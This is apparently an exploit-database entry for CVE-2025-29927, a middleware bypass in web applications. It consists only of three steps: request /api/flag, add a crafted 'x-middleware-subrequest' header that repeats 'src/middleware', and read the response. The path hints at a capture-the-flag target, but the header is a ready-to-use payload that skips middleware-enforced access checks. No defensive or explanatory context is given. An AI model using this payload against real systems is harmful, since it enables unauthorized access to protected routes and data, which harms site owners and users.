## https://sploitus.com/exploit?id=5705D47D-265C-5AA4-9601-7D418954E990 ### CVE-2025-29927 1. go to /api/flag 2. add `x-middleware-subrequest: src/middleware:src/middleware:src/middleware:src/middleware:src/middleware` as header 3. see response